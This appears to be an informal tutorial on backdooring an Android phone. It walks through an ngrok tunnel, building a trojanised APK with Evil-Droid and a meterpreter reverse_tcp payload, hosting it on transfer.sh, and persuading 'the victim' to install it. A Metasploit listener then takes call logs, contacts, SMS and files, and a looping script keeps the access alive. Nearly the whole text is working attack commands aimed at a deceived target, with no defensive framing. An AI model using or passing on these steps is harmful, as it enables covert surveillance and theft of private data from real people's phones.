Hi, all test has done on Kali linux.


Create an account to use tcp connection: https://ngrok.com. Address email like http://www.yopmail.com/en/ work. After create your account, just follow instruction to download, unzip, and create an token.

# 7z x ngrok
# ./ngrok --authtoken xxx

Create a tcp tunnel on port 1234:

# ./ngrok tcp 1234

You will receive something like this:

tcp.ngrok.io:15322 -> localhost:1234


Download evil-droid:

# git clone https://github.com/M4sc3r4n0/Evil-Droid
# cd Evil-Droid
# chmod +x evil-droid
# ./evil-droid
SET LHOST: tcp.ngrok.io
SET LPORT: 15322
PAYLOAD NAME: nice-app
payload option: android/meterpreter/reverse_tcp
choose payload apk: APK-MSF

Choose an image for your backdoored app.
After, evil-droid will create self-signed certificate to sign your android app, once you have your app, EXIT.

Copy file to transfer.sh

cd Evil-Droid/evilapk
# curl --upload-file nice-app.apk https://transfer.sh/nice-app.apk
And give the link to the victim, she he must install the app to their phone.


Open a new terminal, we use metasploit to listen on port 1234.

# msfconsole
  use multi/handler
  set payload android/meterpreter/reverse_tcp
  set lhost
  set lport 1234

To get call log, contact and sms.


type help for other commands.

Maintain the access more time

Now than you have access to the phone, we will upload our script to maintain the access until the phone shutdown.

Open an other terminal to create a little script:

# vim backdoor.sh
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20

And back to metasploit, we are again on the phone:

cd /sdcards/download
upload backdoor.sh
sh backdoor.sh

Ctrl+C to quit, and all the 20sec, the app is maintain will back.

If the phone of the victim shutdown or restart, you lost the access like the backdoor.sh do not start at boot :-(, and we don’t have the root privilege to do this.

Download files

To download files from the phone:

cd /sdcard
cd download
download <filename>